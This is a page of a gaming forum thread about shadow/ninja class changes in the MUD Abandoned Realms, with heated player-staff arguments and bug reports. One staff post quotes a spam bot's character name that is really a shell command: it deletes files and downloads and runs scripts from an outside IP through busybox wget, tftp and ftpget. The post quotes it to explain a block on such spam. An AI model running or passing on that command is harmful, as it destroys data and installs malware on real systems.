Forum Links 

Click to return to main page
 FAQFAQ   SearchSearch   MemberlistMemberlist   UsergroupsUsergroups   RegisterRegister 
 ProfileProfile  Log in to check your private messagesLog in to check your private messages    Log inLog in 
 Current Top Rated Killers 
 Next Event   Voting Links 

The event "The Assault on Taekir" is beginning in 1 day, 7 hours.

Recent shadow updates
Goto page Previous  1, 2, 3, 4, 5, 6, 7, 8  Next

View previous topic :: View next topic  
Ozaru

PostPosted: Sun Jun 19, 2016 8:00 pm    Post subject:

You guys can't have it both ways. You can't expect to get a pat on the back when you implement something new and then when it is poorly designed not to expect criticism. It is obviously a bad look if every new change that is rolled out states that hey guys this was half assed and we know you spent 200 hours on your character and we will allow someone to steam roll you for "testing purposes" please don't get mad when you lose a fight you can't believe you lost.

Thats the problem, here is the solution: Instead of discussing it why not test it. Invite reputable people to play a character well before its release date and get their opinions. Or open another "test mud" to just run around and try these things out. I would be every single player in this mud will be more than willing to give up their free time to test your changes give you positive feed back since it doesn't involve a character they are currently playing and has no standing in the real game. Trust your players before you push them away.

0 0 0
Davairus
Implementor

PostPosted: Sun Jun 19, 2016 8:31 pm    Post subject:

"every single player in this mud will be more than willing to give up their free time"

This is coming from a guy who prays to be banned all the time.

You several idiots can lie to yourselves but I see right through this facade and I can see you don't care. The fact of the matter is this was actually tested very heavily by me along with a person who has been in every cabal and is a veteran. But go on, keep on bleating it wasn't tested at all. I do love listening to your assumptions. Gives some interesting perspective.

One of the very first things I heard after I had worked on shadows was "I was pissed because it wasnt druids" -- dumb.

You can blame divsky for ninjas being OP for a while mostly. As well as anyone else who thought it was a good idea to make ghostwalk like that. It obviously wasnt ok, but hey, why should I have to filter everything retarded. Since you guys are such obvious pros at it. So just keep those shadow suggestions coming. I wont be satisfied until everyone has quit in disgust anyway, right?

TLDR: This is not what "caring" looks like.

0 1
boo,
Ozaru

PostPosted: Sun Jun 19, 2016 8:54 pm    Post subject:

Why are you judging your player base from the comments on one player? Set-up a poll asking if the people here would like to help you out to test new and exciting things I am sure you will get an overwhelming response that is positive. It was tested heavily by two people which is great, imagine if you guys didn't test it and the product that was produced. All the changes that happened after the fact could and should have been prevented maybe if you were better at testing. At least one player may not have deleted from their frustration with the class ie Beia a reputable player in your community.

Isn't his time and willingness to play a game you so love worth more than the frustration he is faced with?

Everything you are saying is full of hate I feel sorry for you. We care about you and your well being. Do not do this to yourself.

0 0 0
Davairus
Implementor

PostPosted: Sun Jun 19, 2016 9:16 pm    Post subject:

Literally all you do is pray to be banned and make trash and you are on a soap box. Why should I care what you say at all, when you so clearly dont?

0 1
boo,
Vanisse
Immortal

PostPosted: Sun Jun 19, 2016 9:26 pm    Post subject:

ozaru, how about instead of speaking for other people, just speak for yourself.

dear playerbase, if you do care about davairus's well-being, stop driving him (and other imms) up the wall with your negative comments. he has already asked you to stop several times, in this thread and multiple other ones. it is very easy for you to just write "we are willing to help you do more testing" and leave it at that. see? constructive comment.

"if you were better at testing" and "i feel sorry for you" are bullshit unhelpful negative comments and we do not need them here.

0 1
boo,
Multore

PostPosted: Sun Jun 19, 2016 9:44 pm    Post subject:

off topic but is the mud down couldn't find a thread stating it was

0 0 0
Multore

PostPosted: Sun Jun 19, 2016 9:51 pm    Post subject:

scratch that, was using port 23 for some reason not 9000, very strange

0 0 0
Nycticora

PostPosted: Mon Jun 20, 2016 1:02 am    Post subject:

yeah sorry about that, I just made a change to try to stop a bunch of dumb telnet spammers from trying to make characters named "Cd /tmp | cd /var/run | cd /dev/shm | cd /mnt | cd /var;rm -f *;busybox wget http://5.196.199.238/bin.sh;sh bin.sh;busybox tftp -r bin2.sh -g 5.196.199.238;sh bin2.sh;busybox tftp 5.196.199.238 -c get bin3.sh;sh bin3.sh;busybox ftpget 5.196.199.238"

0 0 0
Multore

PostPosted: Mon Jun 20, 2016 1:08 am    Post subject:

I don't see anything wrong with that name really. But good call, was it posted some where and I missed it? I found it connecting through the web portal anyway.

0 0 0
Davairus
Implementor

PostPosted: Thu Jun 23, 2016 12:56 am    Post subject:

Hngggh.

0 0 0
icarium

PostPosted: Fri Jun 24, 2016 2:21 am    Post subject:

it is hard to balance any classes across the realms and I appreciate the effort made. Very Happy

0 1
boo,
tayyah

PostPosted: Sat Jun 25, 2016 6:20 pm    Post subject:

umm for ninjitsu shurikens is an option for a specialty but it wont let me choose it... is there a reason for that?

0 0 0
Vanisse
Immortal

PostPosted: Sat Jun 25, 2016 7:08 pm    Post subject:

its not actually an option (wasn't coded). where are you seeing it? wherever it is should be removed

0 0 0
tayyah

PostPosted: Sat Jun 25, 2016 7:14 pm    Post subject:

when you just use "ninjitsu" before you choose a specialty

<137hp 202m 168mv no opponent calm> [-------- ]ninjitsu
What specialization do you want to use? Choose one of: sword, spear, staff, dagger, whip, flail, shuriken.

0 0 0
Vanisse
Immortal

PostPosted: Sat Jun 25, 2016 7:40 pm    Post subject:

ok will fix w next release

0 0 0
m1coftw

PostPosted: Mon Sep 12, 2016 9:32 am    Post subject:

What do the weapon specialities do anyway for shadow?

Noone mentions anything about it nor does the helpfile.

0 0 0
Davairus
Implementor

PostPosted: Mon Sep 12, 2016 4:37 pm    Post subject:

They are going to be taken out and replaced with actual speccing into stealth/poisons/combat or something

0 1
boo,
Vertas

PostPosted: Sat Sep 17, 2016 9:09 pm    Post subject:

I named my first iPod Davairus.
View user's profile Send private message AIM Address Yahoo Messenger MSN Messenger

0 0 0
Davairus
Implementor

PostPosted: Sun Sep 25, 2016 10:11 am    Post subject:

haha what

0 0 0
m1coftw

PostPosted: Sun Sep 25, 2016 10:14 am    Post subject:

Davairus literally means:

"Davai" - Lets go! Do it! Come on! etc. in Russian (one of the most used/universal words)
"rus" - Russian/Russia.

Davai rus!

Just realized that Davairus is a communist spy designed to collect intel about our RP/behavior and send it back to motherland to develop an ultimate mindfucking machine.

1 0 0
Post new topic   Reply to topic    Abandoned Realms Forum Index -> Updates All times are GMT
Goto page Previous  1, 2, 3, 4, 5, 6, 7, 8  Next
Page 7 of 8

Jump to: